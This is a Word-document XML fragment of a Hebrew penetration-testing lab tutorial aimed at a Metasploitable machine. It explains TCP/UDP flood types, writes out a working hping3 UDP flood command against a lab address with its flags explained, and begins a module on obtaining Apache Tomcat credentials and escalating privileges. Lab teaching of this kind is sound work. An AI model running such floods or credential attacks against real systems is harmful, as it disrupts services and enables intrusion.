        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00497E2B" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">הצפה </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>מסוג</w:t>
      </w:r>
      <w:r w:rsidR="00497E2B" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ים שונים</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">syn, syn-ack, fin-syn, ack, res, fin, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>udp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F1790D" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501A0E52" w14:textId="166D9C89" w:rsidR="00F1790D" w:rsidRPr="007D51BF" w:rsidRDefault="00F1790D" w:rsidP="00F1790D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תחילה נוכל להריץ את הפקודה </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hping3 –help</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> כדי לראות את האפשרויות שנוכל לבחור</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461C79B9" w14:textId="79EB0679" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138" w:rsidP="00F1790D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73280" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2AEEEEEB" wp14:editId="4864366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581400" cy="4748755"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="125" name="תמונה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74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96468" w14:textId="66CDC5DE" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138" w:rsidP="00F1790D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F2CB88D" w14:textId="71B0F06E" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138" w:rsidP="00F1790D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C04ABDD" w14:textId="4A421986" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138" w:rsidP="00F1790D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64D9F428" w14:textId="18789181" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138" w:rsidP="00F1790D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6472B5B6" w14:textId="1FB1FBA2" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138" w:rsidP="00F1790D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A0F3AA4" w14:textId="05494F51" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138" w:rsidP="00F1790D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68749091" w14:textId="5ADB0914" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138" w:rsidP="00F1790D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FF82E84" w14:textId="0F1D4729" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138" w:rsidP="00F1790D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="713FB520" w14:textId="34148689" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138" w:rsidP="00F1790D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1279FDA1" w14:textId="6D03C461" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138" w:rsidP="00F1790D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4491B499" w14:textId="24CA390F" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138" w:rsidP="00F1790D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CFBC85E" w14:textId="6242A8C5" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138" w:rsidP="00F1790D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="325179B0" w14:textId="7AB632E5" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138" w:rsidP="00F1790D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ACB72DA" w14:textId="2A01F22F" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138" w:rsidP="00F1790D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27B4B883" w14:textId="5B173F59" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138" w:rsidP="00F1790D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23452871" w14:textId="77777777" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138" w:rsidP="00F1790D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DB66A63" w14:textId="1C48788B" w:rsidR="00F1790D" w:rsidRPr="007D51BF" w:rsidRDefault="00F1790D" w:rsidP="00F1790D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כדי לבצע הצפת </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>udp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> הפקודה היא די פשוטה</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D72D9D" w14:textId="71FD9559" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> hping3 --</w:t>
      </w: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udp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00497E2B" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>flood -p 80 192.168.1.165</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FDCF1D" w14:textId="5AADABED" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138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וההתקפה תתחיל לרוץ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A989D3" w14:textId="48A58B3F" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138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שימו לב שלא יוצג פלט חזרה.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FF836C" w14:textId="32309C67" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138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DECE560" wp14:editId="54285211">
            <wp:extent cx="5143500" cy="769620"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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C0B7" w14:textId="4866D5AD" w:rsidR="00F1790D" w:rsidRPr="007D51BF" w:rsidRDefault="00F1790D" w:rsidP="00F1790D">
      <w:pPr>
        <w:jc w:val="right"/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מציין באיזה מצב ההתקפה תרוץ. </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>–</w:t>
      </w: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udp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5626DE5B" w14:textId="3768406E" w:rsidR="00F1790D" w:rsidRPr="007D51BF" w:rsidRDefault="00F1790D" w:rsidP="00F1790D">
      <w:pPr>
        <w:jc w:val="right"/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מציין את השימוש של המתקפה</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">--flood- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E06D7C8" w14:textId="5F307B0A" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="00F1790D" w:rsidP="00F1790D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:jc w:val="right"/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מציין את הפורט עליו המתקפה תרוץ</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-p-</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5A6BA9" w14:textId="68AEA0BF" w:rsidR="00D5647C" w:rsidRPr="007D51BF" w:rsidRDefault="00D5647C" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79F302A2" w14:textId="4D9BCAB6" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19A6A084" w14:textId="57DB2CD7" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5189CC56" w14:textId="10710F01" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27E8968F" w14:textId="20E4BA67" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01CFBBB7" w14:textId="5C59577A" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138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72256" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="60F42EA4" wp14:editId="2D011145">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>1098550</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-328295</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5722620" cy="3802380"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:wrapNone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949BA" w14:textId="256E4588" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="126E2789" w14:textId="26EF5DEE" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47F33EEA" w14:textId="59C16D79" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C91AC52" w14:textId="2B8CBF2D" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="518EDEB7" w14:textId="7102E340" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16D5071D" w14:textId="057E9691" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6462E089" w14:textId="404CD9E3" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F4FA571" w14:textId="0D8AC0F0" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F186558" w14:textId="05F4B69E" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="180E701E" w14:textId="00F8F272" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78245927" w14:textId="77777777" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138" w:rsidP="00F66138">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18303818" w14:textId="30CC666A" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138" w:rsidP="00F66138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אפשר לראות שנשלחות המון בקשות </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>udp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E6416D" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ו</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>אין תשובה מהשרת.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A16DAA" w14:textId="2A74584E" w:rsidR="00F66138" w:rsidRPr="007D51BF" w:rsidRDefault="00F66138" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42AE1C5D" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4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7D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:rtl/>
        </w:rPr>
        <w:t>8180/</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> Apache Tomcat/Coyote JSP engine 1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C82EC8F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במודול הבא נבצע מספר התקפות על שרת </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.Apache tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ננסה לבצע חשיפת שם משתמש וסיסמא והעלאת הרשאות.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B9FC72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דבר ראשון נוודא שהשרת פעיל וניגש לכתובת המכונה שלנו בפורט 8180</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B167ABB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192.168.1.162:8180</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686F1F30" w14:textId="7DCAF6BF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(כתובת ה</w:t>
      </w:r>
      <w:r w:rsidR="00D5647C" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> של המכונה </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploitable </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> שלי השתנתה)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0C6AAE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671D33" wp14:editId="4BD81FCB">
                <wp:simplePos x="0" y="0"/>
